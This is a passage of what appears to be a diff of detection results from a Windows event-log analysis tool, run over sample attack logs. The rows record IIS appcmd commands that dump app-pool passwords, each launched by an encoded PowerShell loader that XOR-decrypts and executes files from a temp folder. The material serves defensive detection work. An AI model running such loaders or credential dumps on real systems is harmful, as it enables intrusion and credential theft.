JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA== | LID: 0x82423 | PID: 3096 | PGUID: 365ABB72-3D6D-5CEB-0000-00109767FF00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx
+2019-05-27 10:29:17.581 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\inetsrv\appcmd.exe"" list apppool /text:processmodel.password | Process: C:\Windows\System32\inetsrv\appcmd.exe | User: IIS APPPOOL\DefaultAppPool | Parent Cmd: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA== | LID: 0x82423 | PID: 2928 | PGUID: 365ABB72-3D6D-5CEB-0000-0010576BFF00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx
+2019-05-27 10:29:17.661 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\inetsrv\appcmd.exe"" list apppool ""Filename: redirection.config"" /text:processmodel.username | Process: C:\Windows\System32\inetsrv\appcmd.exe | User: IIS APPPOOL\DefaultAppPool | Parent Cmd: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA== | LID: 0x82423 | PID: 1340 | PGUID: 365ABB72-3D6D-5CEB-0000-00108270FF00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx
+2019-05-27 10:29:17.731 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\inetsrv\appcmd.exe"" list apppool ""Filename: redirection.config"" /text:processmodel.password | Process: C:\Windows\System32\inetsrv\appcmd.exe | User: IIS APPPOOL\DefaultAppPool | Parent Cmd: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA== | LID: 0x82423 | PID: 2448 | PGUID: 365ABB72-3D6D-5CEB-0000-00104474FF00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx
+2019-05-27 10:29:17.811 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\inetsrv\appcmd.exe"" list apppool /text:processmodel.username | Process: C:\Windows\System32\inetsrv\appcmd.exe | User: IIS APPPOOL\DefaultAppPool | Parent Cmd: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA== | LID: 0x82423 | PID: 3444 | PGUID: 365ABB72-3D6D-5CEB-0000-00100478FF00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx
+2019-05-27 10:29:17.891 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\inetsrv\appcmd.exe"" list apppool /text:processmodel.password | Process: C:\Windows\System32\inetsrv\appcmd.exe | User: IIS APPPOOL\DefaultAppPool | Parent Cmd: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAA